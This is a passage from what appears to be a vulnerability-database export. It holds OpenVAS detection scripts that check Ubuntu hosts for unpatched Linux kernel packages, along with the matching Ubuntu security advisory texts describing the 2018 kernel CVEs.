Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843840\");\n script_version(\"$Revision: 14288 $\");\n script_cve_id(\"CVE-2018-17972\", \"CVE-2018-18281\", \"CVE-2018-18445\",\n \"CVE-2018-18653\", \"CVE-2018-18955\", \"CVE-2018-6559\");\n script_bugtraq_id(106054);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-04 12:40:51 +0530 (Tue, 04 Dec 2018)\");\n script_name(\"Ubuntu Update for linux-aws USN-3832-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU18\\.10\");\n\n script_xref(name:\"USN\", value:\"3832-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3832-1/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-aws'\n package(s) announced via the USN-3832-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Jann Horn discovered that the procfs file system implementation in the\nLinux kernel did not properly restrict the ability to inspect the kernel\nstack of an arbitrary task. A local attacker could use this to expose\nsensitive information. (CVE-2018-17972)\n\nJann Horn discovered that the mremap() system call in the Linux kernel did\nnot properly flush the TLB when completing, potentially leaving access to a\nphysical page after it has been released to the page allocator. A local\nattacker could use this to cause a denial of service (system crash), expose\nsensitive information, or possibly execute arbitrary code. (CVE-2018-18281)\n\nIt was discovered that the BPF verifier in the Linux kernel did not\ncorrectly compute numeric bounds in some situations. A local attacker could\nuse this to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-18445)\n\nDaniel Dadap discovered that the module loading implementation in the Linux\nkernel did not properly enforce signed module loading when booted with UEFI\nSecure Boot in some situations. A local privileged attacker could use this\nto execute untrusted code in the kernel. (CVE-2018-18653)\n\nJann Horn discovered that the Linux kernel mishandles mapping UID or GID\nranges inside nested user namespaces in some situations. A local attacker\ncould use this to bypass access controls on resources outside the\nnamespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the Linux\nkernel did not properly verify the directory contents permissions from\nwithin a unprivileged user namespace. A local attacker could use this to\nexpose sensitive information (protected file names). (CVE-2018-6559)\");\n\n script_tag(name:\"affected\", value:\"linux-aws on Ubuntu 18.10.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU18.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.18.0-1006-aws\", ver:\"4.18.0-1006.7\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.18.0.1006.6\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-19T12:26:43", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-12-04T00:00:00", "id": "OPENVAS:1361412562310843843", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843843", "title": "Ubuntu Update for linux USN-3836-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3836_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for linux USN-3836-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843843\");\n script_version(\"$Revision: 14288 $\");\n script_cve_id(\"CVE-2018-18955\", \"CVE-2018-6559\");\n script_tag(name:\"cvss_base\", value:\"4.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-04 07:53:44 +0100 (Tue, 04 Dec 2018)\");\n script_name(\"Ubuntu Update for linux USN-3836-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU18\\.04 LTS\");\n\n script_xref(name:\"USN\", value:\"3836-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2018-December/004694.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the USN-3836-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Jann Horn discovered that the Linux kernel mishandles mapping UID or GID\nranges inside nested user namespaces in some situations. A local attacker\ncould use this to bypass access controls on resources outside the\nnamespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the Linux\nkernel did not properly verify the directory contents permissions from\nwithin a unprivileged user namespace. A local attacker could use this to\nexpose sensitive information (protected file names). (CVE-2018-6559)\");\n\n script_tag(name:\"affected\", value:\"linux on Ubuntu 18.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1025-gcp\", ver:\"4.15.0-1025.26\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1027-kvm\", ver:\"4.15.0-1027.27\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1029-raspi2\", ver:\"4.15.0-1029.31\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-42-generic\", ver:\"4.15.0-42.45\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-42-generic-lpae\", ver:\"4.15.0-42.45\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-42-lowlatency\", ver:\"4.15.0-42.45\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-42-snapdragon\", ver:\"4.15.0-42.45\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gcp\", ver:\"4.15.0.1025.27\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.15.0.42.44\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.15.0.42.44\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.15.0.1025.27\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.15.0.1027.27\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.15.0.42.44\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.15.0.1029.27\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.15.0.42.44\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-19T12:26:34", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-12-04T00:00:00", "id": "OPENVAS:1361412562310843842", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843842", "title": "Ubuntu Update for linux-gcp USN-3836-2", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3836_2.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for linux-gcp USN-3836-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843842\");\n script_version(\"$Revision: 14288 $\");\n script_cve_id(\"CVE-2018-18955\", \"CVE-2018-6559\");\n script_tag(name:\"cvss_base\", value:\"4.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-04 07:53:40 +0100 (Tue, 04 Dec 2018)\");\n script_name(\"Ubuntu Update for linux-gcp USN-3836-2\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n script_xref(name:\"USN\", value:\"3836-2\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2018-December/004695.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-gcp'\n package(s) announced via the USN-3836-2 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"USN-3836-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu\n16.04 LTS.\n\nJann Horn discovered that the Linux kernel mishandles mapping UID or GID\nranges inside nested user namespaces in some situations. A local attacker\ncould use this to bypass access controls on resources outside the\nnamespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the Linux\nkernel did not properly verify the directory contents permissions from\nwithin a unprivileged user namespace. A local attacker could use this to\nexpose sensitive information (protected file names). (CVE-2018-6559)\");\n\n script_tag(name:\"affected\", value:\"linux-gcp on Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1025-gcp\", ver:\"4.15.0-1025.26~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-42-generic\", ver:\"4.15.0-42.45~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-42-generic-lpae\", ver:\"4.15.0-42.45~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-42-lowlatency\", ver:\"4.15.0-42.45~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gcp\", ver:\"4.15.0.1025.39\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-hwe-16.04\", ver:\"4.15.0.42.63\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-hwe-16.04\", ver:\"4.15.0.42.63\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.15.0.1025.39\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-hwe-16.04\", ver:\"4.15.0.42.63\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-oem\", ver:\"4.15.0.42.63\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-19T12:26:21", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-12-04T00:00:00", "id": "OPENVAS:1361412562310843841", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843841", "title": "Ubuntu Update for linux USN-3835-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3835_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for linux USN-3835-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843841\");\n script_version(\"$Revision: 14288 $\");\n script_cve_id(\"CVE-2018-17972\", \"CVE-2018-18281\", \"CVE-2018-18445\", \"CVE-2018-18653\", \"CVE-2018-18955\", \"CVE-2018-6559\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-04 07:53:24 +0100 (Tue, 04 Dec 2018)\");\n script_name(\"Ubuntu Update for linux USN-3835-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU18\\.10\");\n\n script_xref(name:\"USN\", value:\"3835-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2018-December/004693.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the USN-3835-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Jann Horn discovered that the procfs file system implementation in the\nLinux kernel did not properly restrict the ability to inspect the kernel\nstack of an arbitrary task. A local attacker could use this to expose\nsensitive information. (CVE-2018-17972)\n\nJann Horn discovered that the mremap() system call in the Linux kernel did\nnot properly flush the TLB when completing, potentially leaving access to a\nphysical page after it has been released to the page allocator. A local\nattacker could use this to cause a denial of service (system crash), expose\nsensitive information, or possibly execute arbitrary code. (CVE-2018-18281)\n\nIt was discovered that the BPF verifier in the Linux kernel did not\ncorrectly compute numeric bounds in some situations. A local attacker could\nuse this to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-18445)\n\nDaniel Dadap discovered that the module loading implementation in the Linux\nkernel did not properly enforce signed module loading when booted with UEFI\nSecure Boot in some situations. A local privileged attacker could use this\nto execute untrusted code in the kernel. (CVE-2018-18653)\n\nJann Horn discovered that the Linux kernel mishandles mapping UID or GID\nranges inside nested user namespaces in some situations. A local attacker\ncould use this to bypass access controls on resources outside the\nnamespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the Linux\nkernel did not properly verify the directory contents permissions from\nwithin a unprivileged user namespace. A local attacker could use this to\nexpose sensitive information (protected file names). (CVE-2018-6559)\");\n\n script_tag(name:\"affected\", value:\"linux on Ubuntu 18.10.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU18.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.18.0-1004-gcp\", ver:\"4.18.0-1004.5\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.18.0-1005-kvm\", ver:\"4.18.0-1005.5\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.18.0-1007-raspi2\", ver:\"4.18.0-1007.9\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.18.0-12-generic\", ver:\"4.18.0-12.13\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.18.0-12-generic-lpae\", ver:\"4.18.0-12.13\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.18.0-12-lowlatency\", ver:\"4.18.0-12.13\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.18.0-12-snapdragon\", ver:\"4.18.0-12.13\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gcp\", ver:\"4.18.0.1004.4\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.18.0.12.13\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.18.0.12.13\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.18.0.1004.4\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.18.0.1005.5\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.18.0.12.13\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.18.0.1007.4\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.18.0.12.13\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2019-01-29T20:33:33", "bulletinFamily": "unix", "description": "USN-3836-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu 16.04 LTS.\n\nJann Horn discovered that the Linux kernel mishandles mapping UID or GID ranges inside nested user namespaces in some situations. A local attacker could use this to bypass access controls on resources outside the namespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the Linux kernel did not properly verify the directory contents permissions from within a unprivileged user namespace. A local attacker could use this to expose sensitive information (protected file names). (CVE-2018-6559)", "modified": "2018-12-04T00:00:00", "published": "2018-12-04T00:00:00", "id": "USN-3836-2", "href": "https://usn.ubuntu.com/3836-2/", "title": "Linux kernel (HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-29T20:34:28", "bulletinFamily": "unix", "description": "Jann Horn discovered that the procfs file system implementation in the Linux kernel did not properly restrict the ability to inspect the kernel stack of an arbitrary task. A local attacker could use this to expose sensitive information. (CVE-2018-17972)\n\nJann Horn discovered that the mremap() system call in the Linux kernel did not properly flush the TLB when completing, potentially leaving access to a physical page after it has been released to the page allocator. A local attacker could use this to cause a denial of service (system crash), expose sensitive information, or possibly execute arbitrary code. (CVE-2018-18281)\n\nIt was discovered that the BPF verifier in the Linux kernel did not correctly compute numeric bounds in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-18445)\n\nDaniel Dadap discovered that the module loading implementation in the Linux kernel did not properly enforce signed module loading when booted with UEFI Secure Boot in some situations. A local privileged attacker could use this to execute untrusted code in the kernel. (CVE-2018-18653)\n\nJann Horn discovered that the Linux kernel mishandles mapping UID or GID ranges inside nested user namespaces in some situations. A local attacker could use this to bypass access controls on resources outside the namespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the Linux kernel did not properly verify the directory contents permissions from within a unprivileged user namespace. A local attacker could use this to expose sensitive information (protected file names). (CVE-2018-6559)", "modified": "2018-12-03T00:00:00", "published": "2018-12-03T00:00:00", "id": "USN-3835-1", "href": "https://usn.ubuntu.com/3835-1/", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-29T20:33:11", "bulletinFamily": "unix", "description": "Jann Horn discovered that the Linux kernel mishandles mapping UID or GID ranges inside nested user namespaces in some situations. A local attacker could use this to bypass access controls on resources outside the namespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the Linux kernel did not properly verify the directory contents permissions from within a unprivileged user namespace. A local attacker could use this to expose sensitive information (protected file names). (CVE-2018-6559)", "modified": "2018-12-03T00:00:00", "published": "2018-12-03T00:00:00", "id": "USN-3836-1", "href": "https://usn.ubuntu.com/3836-1/", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-12-07T12:58:58", "bulletinFamily": "unix", "description": "Jann Horn discovered that the procfs file system implementation in the Linux kernel did not properly restrict the ability to inspect the kernel stack of an arbitrary task. A local attacker could use this to expose sensitive information. (CVE-2018-17972)\n\nJann Horn discovered that the mremap() system call in the Linux kernel did not properly flush the TLB when completing, potentially leaving access to a physical page after it has been released to the page allocator. A local attacker could use this to cause a denial of service (system crash), expose sensitive information, or possibly execute arbitrary code. (CVE-2018-18281)\n\nIt was discovered that the BPF verifier in the Linux kernel did not correctly compute numeric bounds in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-18445)\n\nDaniel Dadap discovered that the module loading implementation in the Linux kernel did not properly enforce signed module loading when booted with UEFI Secure Boot in some situations. A local privileged attacker could use this to execute untrusted code in the kernel. (CVE-2018-18653)\n\nJann Horn discovered that the Linux kernel mishandles mapping UID or GID ranges inside nested user namespaces in some situations. A local attacker could use this to bypass access controls on resources outside the namespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the Linux kernel did not properly verify the directory contents permissions from within a unprivileged user namespace. A local attacker 